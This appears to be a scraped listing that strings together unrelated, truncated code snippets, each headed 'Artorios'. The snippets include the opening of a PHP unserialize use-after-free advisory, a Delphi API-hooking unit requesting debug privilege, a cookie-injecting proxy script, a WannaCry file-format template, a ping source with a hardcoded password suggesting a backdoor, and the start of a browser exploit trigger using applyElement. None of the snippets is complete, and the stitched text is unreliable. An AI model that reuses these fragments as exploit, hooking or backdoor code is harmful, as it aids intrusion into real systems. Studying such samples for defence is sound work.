Artorios

#Use After Free Vulnerability in unserialize() with DateInterval

Taoguang Chen <@chtg> - Write Date: 2015.2.28 - Release Date: 2015.3.20

A use-after-free vulnerability was discovered in unserialize() with DateInterval object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions

Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23

Artorios

'''
620031587
Net-Centric Computing Assignment
Part A - RSA Encryption
'''

import random


'''

Artorios

unit HookAPI;

interface

uses
  Windows, TlHelp32, MicroDAsm;

const
  SE_DEBUG_NAME            = 'SeDebugPrivilege';
  THREAD_SUSPEND_RESUME    = $0002;

Artorios

cookieFile = ""
def start(context, argv):
	global cookieFile
	cookieFile = argv[1]

def request(context, flow):
	f = open(cookieFile)
	cookie =f.read().strip()
	f.close()
	if cookie != "":

Artorios

/*
# 010 Template for t.wnry

typedef struct {
	char				Signature[8]; // WANACRY!
	uint32				Part1Size; // Always 0x100
    char                DataPart1[Part1Size];
	uint32				Part2Signature;
    uint64              Part2Size;
    char                DataPart2[Part2Size];

Artorios

#define PASSWD "123456"
/*
 * Copyright (c) 1989 The Regents of the University of California.
 * All rights reserved.
 *
 * This code is derived from software contributed to Berkeley by
 * Mike Muuss.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions

Artorios

<html>
<script>
function trigger()
{
  var id_0 = document.createElement("sup");
  var id_1 = document.createElement("audio");

  document.body.appendChild(id_0);
  document.body.appendChild(id_1);
  id_1.applyElement(id_0);